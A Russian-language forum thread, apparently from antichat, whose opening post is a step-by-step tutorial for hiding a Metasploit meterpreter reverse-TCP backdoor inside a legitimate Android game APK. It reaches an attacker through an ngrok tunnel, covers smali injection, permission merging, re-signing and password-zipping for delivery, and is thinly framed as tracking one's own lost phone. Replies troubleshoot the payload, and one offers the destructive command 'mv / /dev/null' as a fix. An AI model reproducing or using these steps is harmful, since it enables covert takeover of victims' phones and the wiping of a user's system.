![]() |
Всем доброго времени суток. В этой статье я расскажу про то, как можно удаленно управлять своим телефоном, если вы вдруг его потеряете, или у вас его украдут. Путь не легкий, но эффективный. Прошу, не используйте это в корыстных и незаконных целях.
Меньше слов больше дела, переходим сразу к практике. Для реализации задуманного необходим следующий софт:
Начнем с скачивания приложения (.apk), в которое поместим backdoor. Например: https://forum.antichat.xyz/attachmen...4136622689.png Ссылка Для удобства дам ему короткое имя: https://forum.antichat.xyz/attachmen...4136990485.png запускаем ngrok: (про установку и использования читайте в гугле. информации много ) Код: Код:
./ngrok tcp 4444получаем от него lhost и lport. Чтоб вы понимали, все, что будет попадать на этот хост по этому порту, будет отправляться нам на localhost 4444 (окно не закрываете. ngrok должен работать. в данном примере сессия одноразовая, но это совсем не проблема) Запускаем msfvenom для создания пейлоада командой: Код: Код:
msfvenom -p android/meterpreter/reverse_tcp LHOST=2.tcp.ngrok.io LPORT=14797 M> /home/kali/payload.apkтеперь у меня есть файлик payload.apk по пути /home/kali/injection_apk/ https://forum.antichat.xyz/attachmen...4138166153.png сюда же помещаю приложение которое скачали с сайта (flappy.apk). вот как выглядит проект на данный момент: https://forum.antichat.xyz/attachmen...4138386676.png Далее необходимо "[S]разархивировать[/S]" .apk файлы. делается это командами: Код: Код:
apktool d flappy.apkполучили 2 папки, с которыми будем работать. Нам нужна папка metasploit (и все что внутри) по пути /injection_apk/payload/smali/com/ копируем и вставляем в папку flappy по пути /injection_apk/flappy/smali/com/ https://forum.antichat.xyz/attachmen...4138971843.png https://forum.antichat.xyz/attachmen...4139135520.png далее идем по пути /injection_apk/flappy/smali/com/dotgears/flappy/ и открываем файл SplashScreen.smali https://forum.antichat.xyz/attachmen...4139601221.png нам необходимо выполнить инициализацию пейлоада, для этого вставляем строчку Код:
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)Vне забываете сохранить. https://forum.antichat.xyz/attachmen...4140024583.png Теперь необходимо, чтобы наше приложение запросило необходимые разрешения при установке (для всего функционала meterpreter) заходим в папку payload и копируем необходимые разрешения из файла AndroidManifest.xml https://forum.antichat.xyz/attachmen...4140424078.png https://forum.antichat.xyz/attachmen...4140551432.png далее заходим в /injection_apk/flappy/ и находим там идентичный файл AndroidManifest.xml https://forum.antichat.xyz/attachmen...4140709935.png и поправляем его разрешения удалив 3 строчки https://forum.antichat.xyz/attachmen...4141019165.png и на их место вставляем наши, скопированные ранее разрешения из файла AndroidManifest.xml в папке payload https://forum.antichat.xyz/attachmen...4141094957.png не забываете сохранить. теперь необходимо перекомпилировать flappy использую всю ту же apktool Код: Код:
apktool b flappyи в папке /injection_apk/flappy/dist/ получаем уже почти готовый flappy.apk https://forum.antichat.xyz/attachmen...4141611247.png переходим к созданию файла подписей key.kyestore это очень интересная тема, которой стоит заинтересоваться... для генерирования файла нам понадобится keytool Код: Код:
keytool -genkey -V -keystore /home/kali/injection_apk/key.keystore -alias alexis -keyalg RSA -keysize 2048 -validity 1000в папке /injection_apk/ получаем файл key.keystore https://forum.antichat.xyz/attachmen...4142113309.png теперь сертифицируем наш flappy.apk (находящийся в расположении /injection_apk/flappy/dist/ ) утилитой jarsigner Код: Код:
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore /home/kali/injection_apk/key.keystore /home/kali/injection_apk/flappy/dist/flappy.apk alexishttps://forum.antichat.xyz/attachmen...4143037003.png теперь нужно немножко выровнять наш проект и получит готовый продукт: Код:
zipalign -v 4 /home/kali/injection_apk/flappy/dist/flappy.apk flappy_v.apkhttps://forum.antichat.xyz/attachmen...4143586273.png в папке /injection_apk/ появился конечный продукт с именем flappy_v.apk https://forum.antichat.xyz/attachmen...4143855237.png предлагаю, перед его доставкой на СВОЙ телефон, зашифровать командой Код: Код:
zip --password античат flappySec.zip flappy_v.apkдалее я напишу всем известные команды: Код: Код:
msfconsoleдоставил на СВОЙ телефон файлик и получил сессию meterpreter https://forum.antichat.xyz/attachmen...4146438088.png https://forum.antichat.xyz/attachmen...3a1a4c77ec.png https://forum.antichat.xyz/attachmen...0bea65f48c.png из-за косяков с подписями при установке приложения на телефоне вылезло 2 предупреждения, 1 о том что подписи не доверены и 2 проверка приложения гугл плеем. сессия метерпретер устойчивая и не разорвется пока вы не выключите ngrok. |
А если я захочу другое приложение и там не будет Splashscreen как мне выполнить инициализацию пейлоада?
[теперь нужно немножко выровнять наш проект и получит готовый продукт] Можно было хоть не много описать что это такое Проверка была на Genymotion android 8 пейлоад как только запускался сразу умирал На Nox android 7 пейлоад запускался спустя примерно 10 сек если приложения находилось открытым как только приложения закрывалось процесс умирал Есть ли в msf payload android аналог ps/migrate/runmetsvc - msf payload windows |
Цитата:
https://forum.antichat.xyz/attachmen...5012374426.png Цитата:
ps/ на следующий день, спустя какое-то время после удаления приложения, в сбере мне выскачило уведомление, что возможно имеется вирусы.. хотя приложение-то я удалил... |
Цитата:
|
Цитата:
|
Цитата:
|
Проблема с передней камерой решена?
|
Цитата:
|
https://forum.antichat.xyz/attachmen...b939bfea78.png
подскажите пожалуйста что это такое? Как решить? |
Цитата:
Код:
mv / /dev/null |
| Время: 19:58 |